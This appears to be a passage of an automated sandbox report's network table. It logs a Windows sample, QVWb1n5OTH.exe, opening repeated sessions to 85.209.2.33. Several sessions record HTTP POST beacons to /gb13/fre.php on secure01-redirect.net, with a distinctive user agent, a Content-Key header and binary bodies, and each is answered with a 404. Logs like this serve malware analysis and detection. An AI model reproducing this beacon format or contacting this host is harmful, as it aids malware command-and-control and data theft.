                                                            161192.168.11.204998485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            162192.168.11.204998585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            163192.168.11.204998685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            164192.168.11.204998785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            165192.168.11.204998885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            166192.168.11.204998985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            167192.168.11.204999085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            168192.168.11.204999185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            169192.168.11.204999285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            17192.168.11.204983485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:10.363765955 CET353OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:11.282218933 CET354INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:10 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            170192.168.11.204999385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            171192.168.11.204999485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            172192.168.11.204999585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            173192.168.11.204999685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            174192.168.11.204999785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            175192.168.11.204999885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            176192.168.11.204999985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            177192.168.11.205000085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            178192.168.11.205000185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            179192.168.11.205000285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            18192.168.11.204983585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:11.911808968 CET355OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:12.627232075 CET355INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:12 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            180192.168.11.205000385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            181192.168.11.205000485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            182192.168.11.205000585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            183192.168.11.205000685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            184192.168.11.205000785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            185192.168.11.205000885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            186192.168.11.205000985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            187192.168.11.205001085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            188192.168.11.205001185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            189192.168.11.205001285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            19192.168.11.204983685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:13.270139933 CET356OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:14.138995886 CET357INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:13 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            190192.168.11.205001385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            191192.168.11.205001485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            192192.168.11.205001585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            193192.168.11.205001685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            194192.168.11.205001785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            195192.168.11.205001885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            196192.168.11.205001985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            197192.168.11.205002085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            198192.168.11.205002185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            199192.168.11.205002285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2192.168.11.204981685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:19:46.111846924 CET199OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:19:47.062947989 CET200INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:20:46 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            20192.168.11.204983785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:14.753817081 CET358OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:15.514650106 CET358INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:14 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            200192.168.11.205002385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            201192.168.11.205002485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            202192.168.11.205002585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            203192.168.11.205002685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            204192.168.11.205002785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            205192.168.11.205002885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            206192.168.11.205002985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            207192.168.11.205003085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            208192.168.11.205003185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            209192.168.11.205003285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            21192.168.11.204983885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:15.930617094 CET359OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:16.611864090 CET359INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:16 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            210192.168.11.205003385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            211192.168.11.205003485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            212192.168.11.205003585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            213192.168.11.205003685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            214192.168.11.205003785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            215192.168.11.205003885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            216192.168.11.205003985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            217192.168.11.205004085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            218192.168.11.205004285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            219192.168.11.205004385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            22192.168.11.204983985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:17.049195051 CET360OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:17.990322113 CET361INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:17 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            220192.168.11.205004485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            221192.168.11.205004585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            222192.168.11.205004685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            223192.168.11.205004785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            224192.168.11.205004885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            225192.168.11.205004985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            226192.168.11.205005085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            227192.168.11.205005185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            228192.168.11.205005285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            229192.168.11.205005385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            23192.168.11.204984085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:18.444506884 CET361OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:19.414263964 CET362INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:18 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            230192.168.11.205005485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            231192.168.11.205005585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            232192.168.11.205005685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            233192.168.11.205005785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            234192.168.11.205005885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            235192.168.11.205005985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            236192.168.11.205006085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            237192.168.11.205006185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            238192.168.11.205006285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            239192.168.11.205006385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            24192.168.11.204984185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:19.850521088 CET363OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:20.647488117 CET363INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:20 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            240192.168.11.205006485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            241192.168.11.205006585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            242192.168.11.205006685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            243192.168.11.205006785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            244192.168.11.205006885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            245192.168.11.205006985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            246192.168.11.205007085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            247192.168.11.205007185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            248192.168.11.205007285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            249192.168.11.205007385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            25192.168.11.204984285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:21.105030060 CET364OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:23.128443956 CET364INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:22 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            250192.168.11.205007485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            251192.168.11.205007585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            252192.168.11.205007685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            253192.168.11.205007785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            254192.168.11.205007885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            255192.168.11.205007985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            256192.168.11.205008085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            257192.168.11.205008185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


